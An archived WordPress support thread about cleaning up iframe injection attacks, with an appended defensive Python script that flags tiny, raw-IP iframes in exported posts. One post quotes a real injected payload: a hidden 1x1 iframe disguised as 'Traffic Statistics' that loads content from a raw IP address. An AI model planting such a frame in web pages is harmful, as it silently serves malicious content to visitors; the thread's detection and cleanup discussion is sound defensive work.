WordPress.org

iFrame Injection still an issue (14 posts)

  1. DocShadow
    Member
    Posted 5 years ago #

    I just finished cleaning up the results of an iFrame injection attack that occurred with WP version 2.5.1.

    I discovered the problem while going to update to 2.6, so hopefully the issue has been resolved. However, for everyone out there who has not upgraded, or for anyone who wants to make sure they have not been compromised:

    Your blog has a cool search feature. Being that almost every iframe injection will be inside a post, you can simply search "iframe" in the manage tab and it will find it. Searching by hand is time consuming, let smarter robots work for you ;)

    Also, be sure to change your admin password if you do find a problem, in case it is less injection and more hacked admin account.

  2. photomill
    Member
    Posted 5 years ago #

    I too have had this problem! I have posted on this site and have e-mailed the WordPress people directly (which is what they say to do if there's a security issue) and have never had any response! The most recent attack inserted the following into a post on my site:

    <!-- Traffic Statistics --> <iframe src="http://61.155.8.157/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe> <!-- End Traffic Statistics -->

    How can this be resolved? Google keeps blocking my site as a distributor of badware.
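
An added example, not part of either post above: a more precise version of the "search for iframe" check from the first post, applied to the kind of hidden frame quoted in the second. It assumes post bodies have been exported as (id, HTML) pairs, for instance from the `post_content` column of `wp_posts`; the sample posts, the helper names and the 192.0.2.10 address are constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample posts (not from the thread); 192.0.2.10 is a documentation address.
SAMPLE_POSTS = [
    (101, '<p>Hi</p><!-- Traffic Statistics --> <iframe src="http://192.0.2.10/iframe/stats.php" frameborder="0" height="1" width="1"></iframe>'),
    (102, '<p>Talk:</p><iframe src="https://video.example.org/embed/42" width="560" height="315"></iframe>'),
    (103, '<p>No frames here, only the word iframe in the text.</p>'),
]

class IframeFinder(HTMLParser):
    """Collects the attributes of every real <iframe> tag in a post body."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})

def _tiny(value):
    """True for dimensions such as 0, 1 or "1px" that make a frame invisible."""
    digits = value.strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 2

def _ip_host(src):
    """True when the frame source uses a bare IP address instead of a hostname."""
    try:
        ipaddress.ip_address(urlparse(src).hostname or "")
        return True
    except ValueError:
        return False

def audit_posts(posts):
    """Return (post_id, src, reasons) for every iframe found in the posts."""
    findings = []
    for post_id, html in posts:
        finder = IframeFinder()
        finder.feed(html)
        for frame in finder.frames:
            src, reasons = frame.get("src", ""), []
            if _tiny(frame.get("width", "")) or _tiny(frame.get("height", "")):
                reasons.append("near-invisible size")
            if _ip_host(src):
                reasons.append("raw IP address as host")
            findings.append((post_id, src, reasons or ["review manually"]))
    return findings

if __name__ == "__main__":
    print(*audit_posts(SAMPLE_POSTS), sep="\n")
```

Unlike a plain text search, this skips post 103 (the word appears only in prose) and separates the 1x1 frame in post 101 from the ordinary embed in post 102, which still gets listed for manual review.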

  3. whooami
    Member
    Posted 5 years ago #

    http://wordpress.org/support/topic/173519?replies=1

    and you posted about this 3 months ago. If you don't know what you are doing, and cannot, in three months' time, locate instructions, why are you continuing to struggle? PAY someone to do what you obviously cannot.

  4. photomill
    Member
    Posted 5 years ago #

    Thanks for the help. People come here for help and this is your response? Don't be part of the problem. So much for a sense of community.

  5. whooami
    Member
    Posted 5 years ago #

    photomill, I provided excellent advice - take it or leave it. You've seemingly spent months with the same recurring problem, and you're scoffing because someone suggests you locate someone that knows MORE than you, and throw some change at them to fix something you appear unable to manage?

    How long would you leave your car up on blocks while you struggled with a transmission repair, before you would get a mechanic?

    I hadn't even looked closely enough at your post history, before -- I thought it had been an issue for three months (which is bad enough) but looking again, your first post here, 5 months ago, suggests a problem.
    Maybe you don't seem to realize that hacked sites, compromised sites, of ANY kind, are detrimental to the larger WWW -- that includes me, that includes everyone you share your hosting with. That you can't, or won't, do whatever it takes to secure your site from continuing OR repeated attacks/exploits/etc. doesn't just adversely affect you.

  6. whooami
    Member
    Posted 5 years ago #

    I went through your few posts in your history here.

    Is this your blog?
    http://www.goutdevie.com/?page_id=130

    Because I have to tell you that if you want to try and call me out on having a "sense of community" perhaps you need a swift kick in the *** on "personal responsibility".

    <meta name="generator" content="WordPress 2.2">

    Assuming that IS your blog, as you seem to indicate in this thread, you need to upgrade, and until you do -- The issue is with you, not me.

    Here is the second best advice you can get:

    http://codex.wordpress.org/Upgrading_WordPress

  7. photomill
    Member
    Posted 5 years ago #

    Now that last bit was actually helpful advice. I appreciate that.

    I don't live to blog. I don't build websites. So no, I don't spend all the time in the world on this stuff. But damn - all I did was ask a simple question. You calling me incapable is not a polite way to convey your opinion to someone. Perhaps something simpler such as "maybe you should hire someone to help". No need to be a **** and tell me I need a kick in the ***. Seriously.

  8. whooami
    Member
    Posted 5 years ago #

    WHY do people INSIST on reading things that do NOT exist? The ONLY occurrence of the word "incapable" (prior to this usage) is yours.

    I said you don't know what you are doing - and you don't. Your blog isn't upgraded, it's been exploited and exploitable for months. I'm calling a spade a spade.

    You do not have to "live to blog", you don't have to "build websites" but you ought to accept the fact that having a web site, especially having a web site that relies on PHP to serve dynamic content IS a responsibility. And I'm sorry, if you don't like that -- that's just the way it is. You either accept that fact, deal with it, and do the right thing, or you enlist paid or unpaid help, or you suffer the consequences of inaction, or lack of the "right" action, like you are now, with your site.

    You may not like hearing all of this, and I'm not going to sugarcoat it for you. I will NOT placate, appease, or enable persons that continue to use insecure versions of WordPress, for ANY REASON. There is NO excuse.

    It's not personal.

  9. photomill
    Member
    Posted 5 years ago #

    "Pay someone to do what you obviously can't" isn't calling someone incapable? You're right - I need to upgrade. Could have said that from the get go.

  10. whooami
    Member
    Posted 5 years ago #

    You're right - I need to upgrade. Could have said that from the get go.

    and how would you expect me to know that? Did you provide a link to your blog in any of your posts in this thread? No. Did you indicate what version of WP you happen to be using? No. (I could really insert a smart ass remark here, but I won't.)

    You want to "read into" stuff that's not here, you have it. If the shoe fits... Go. Go forth, prove me wrong. Please.

  11. photomill
    Member
    Posted 5 years ago #

    Look, I said thanks for your help already. Isn't that enough? No more time for this. I don't have the leisure of being a student.

  12. whooami
    Member
    Posted 5 years ago #

    then. don't. reply.

  13. Anonymous
    Unregistered
    Posted 5 years ago #

    photomill, it was right of you to notify WP directly, as an <iframe> injection is really a matter of the source code not filtering/escaping incoming data properly and that should be fixed ASAP.

    That being said, whenever you encounter a security flaw or a bug, the first thing you should do is upgrade, quite often that will solve the problem.

  14. photomill
    Member
    Posted 5 years ago #

    Thanks Hockey! I appreciate that. I'm in the process of upgrading now.

Topic Closed

This topic has been closed to new replies.
